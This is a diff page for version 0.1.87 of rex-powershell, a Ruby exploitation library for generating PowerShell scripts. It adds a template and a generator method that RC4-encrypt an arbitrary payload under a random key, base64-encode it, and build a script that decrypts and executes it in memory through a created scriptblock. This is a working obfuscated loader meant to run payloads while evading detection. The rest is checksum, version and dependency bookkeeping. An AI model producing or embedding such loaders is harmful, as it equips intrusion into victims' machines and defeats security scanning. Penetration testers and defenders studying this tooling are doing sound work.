rex-powershell 0.1.86 → 0.1.87

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 2d26075990237181aafd00190e76bac14acdee1393e77231d0f1f24f3122dc36
4
- data.tar.gz: d3b8f606d7b8cfc376d4ea7e71461008336d0aa9ffcbab1ed70f1ff9bf41c5fa
3
+ metadata.gz: 764fea22dc597fbfbf2af172ae81f6dccebf23d280d94683cd3220987565e567
4
+ data.tar.gz: df359a4703480f97a0353d840283099960fca5db2679cc67a812ffe0d7a8770b
5
5
  SHA512:
6
- metadata.gz: 1c0f6e5aada793a549fb022bead14e6e1996f17ef786d796bbe194daca9d65db78842e56036b0dcf7d938505f71860f1408603103b96199fa3c924443bfb44a6
7
- data.tar.gz: d16cc849d1fb7121e86a9bf267a07bd2dc717fc448ae8797f939c4461a08a857694aa5a3e5ebda5d6c7ca4fe2c17af678d7ceea15cf92a4b7118f50131c8895a
6
+ metadata.gz: e491690da3d3fc1d0c4be168b6029d612da06b5012d05f4f7ad9aea85aaa088d154ce37f499244b765072e60067c87a13b25c3d356e8313092602ca4416a5e06
7
+ data.tar.gz: e8b2607028adf09d185abf0c0833240c3232198c78f9ff928b0c8936ec4592c7c88a988c96bdaf8dac26da33ff1e6d510297283bf276e2bc2bdb0fb0af489a67
Binary file
data.tar.gz.sig CHANGED
Binary file
@@ -0,0 +1,40 @@
1
+ function %{func_rc4_decrypt} {
2
+ param([Byte[]]$%{var_rc4buffer})
3
+
4
+ $%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
5
+
6
+ $s = New-Object Byte[] 256;
7
+ $k = New-Object Byte[] 256;
8
+
9
+ for ($i = 0; $i -lt 256; $i++)
10
+ {
11
+ $s[$i] = [Byte]$i;
12
+ $k[$i] = $%{var_key}[$i %% $%{var_key}.Length];
13
+ }
14
+
15
+ $j = 0;
16
+ for ($i = 0; $i -lt 256; $i++)
17
+ {
18
+ $j = ($j + $s[$i] + $k[$i]) %% 256;
19
+ $temp = $s[$i];
20
+ $s[$i] = $s[$j];
21
+ $s[$j] = $temp;
22
+ }
23
+
24
+ $i = $j = 0;
25
+ for ($x = 0; $x -lt $%{var_rc4buffer}.Length; $x++)
26
+ {
27
+ $i = ($i + 1) %% 256;
28
+ $j = ($j + $s[$i]) %% 256;
29
+ $temp = $s[$i];
30
+ $s[$i] = $s[$j];
31
+ $s[$j] = $temp;
32
+ [int]$t = ($s[$i] + $s[$j]) %% 256;
33
+ $%{var_rc4buffer}[$x] = $%{var_rc4buffer}[$x] -bxor $s[$t];
34
+ }
35
+
36
+ $%{var_rc4buffer}
37
+ }
38
+
39
+ &([scriptblock]::create(([system.Text.Encoding]::UTF8).GetString((%{func_rc4_decrypt} ([System.Convert]::FromBase64String("%{b64payload}"))))))
40
+
@@ -1,5 +1,6 @@
1
1
  # -*- coding: binary -*-
2
2
  require 'rex/random_identifier'
3
+ require 'rc4'
3
4
 
4
5
  module Rex
5
6
  module Powershell
@@ -106,6 +107,27 @@ module Payload
106
107
  read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
107
108
  end
108
109
 
110
+ #
111
+ # PSH script that executes an RC4 encrypted payload with Invoke-Expression
112
+ # by Adrian Vollmer (SySS GmbH, https://www.syss.de)
113
+ #
114
+ def self.to_win32pe_psh_rc4(template_path = TEMPLATE_DIR, code)
115
+ rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
116
+ rig.init_var(:func_rc4_decrypt)
117
+ rig.init_var(:var_rc4buffer)
118
+ rig.init_var(:var_key)
119
+
120
+ key = Rex::Text.rand_text_alpha(rand(8)+8)
121
+ rc4 = RC4.new(key)
122
+ enc_code = rc4.encrypt(code)
123
+
124
+ hash_sub = rig.to_h
125
+ hash_sub[:random_key] = key
126
+ hash_sub[:b64payload] = Rex::Text.encode_base64(enc_code)
127
+
128
+ read_replace_script_template(template_path, "to_mem_rc4.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
129
+ end
130
+
109
131
  end
110
132
  end
111
133
  end
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.86"
3
+ VERSION = "0.1.87"
4
4
  end
5
5
  end
@@ -26,4 +26,5 @@ Gem::Specification.new do |spec|
26
26
 
27
27
  spec.add_runtime_dependency 'rex-text'
28
28
  spec.add_runtime_dependency 'rex-random_identifier'
29
+ spec.add_runtime_dependency 'ruby-rc4'
29
30
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-powershell
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.86
4
+ version: 0.1.87
5
5
  platform: ruby
6
6
  authors:
7
7
  - David 'thelightcosine' Maloney
@@ -93,7 +93,7 @@ cert_chain:
93
93
  JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
94
94
  DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
95
95
  -----END CERTIFICATE-----
96
- date: 2020-02-17 00:00:00.000000000 Z
96
+ date: 2020-02-21 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: bundler
@@ -165,6 +165,20 @@ dependencies:
165
165
  - - ">="
166
166
  - !ruby/object:Gem::Version
167
167
  version: '0'
168
+ - !ruby/object:Gem::Dependency
169
+ name: ruby-rc4
170
+ requirement: !ruby/object:Gem::Requirement
171
+ requirements:
172
+ - - ">="
173
+ - !ruby/object:Gem::Version
174
+ version: '0'
175
+ type: :runtime
176
+ prerelease: false
177
+ version_requirements: !ruby/object:Gem::Requirement
178
+ requirements:
179
+ - - ">="
180
+ - !ruby/object:Gem::Version
181
+ version: '0'
168
182
  description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
169
183
  scripts
170
184
  email:
@@ -185,6 +199,7 @@ files:
185
199
  - data/templates/to_mem_msil.ps1.template
186
200
  - data/templates/to_mem_old.ps1.template
187
201
  - data/templates/to_mem_pshreflection.ps1.template
202
+ - data/templates/to_mem_rc4.ps1.template
188
203
  - lib/rex/powershell.rb
189
204
  - lib/rex/powershell/command.rb
190
205
  - lib/rex/powershell/function.rb
metadata.gz.sig CHANGED
Binary file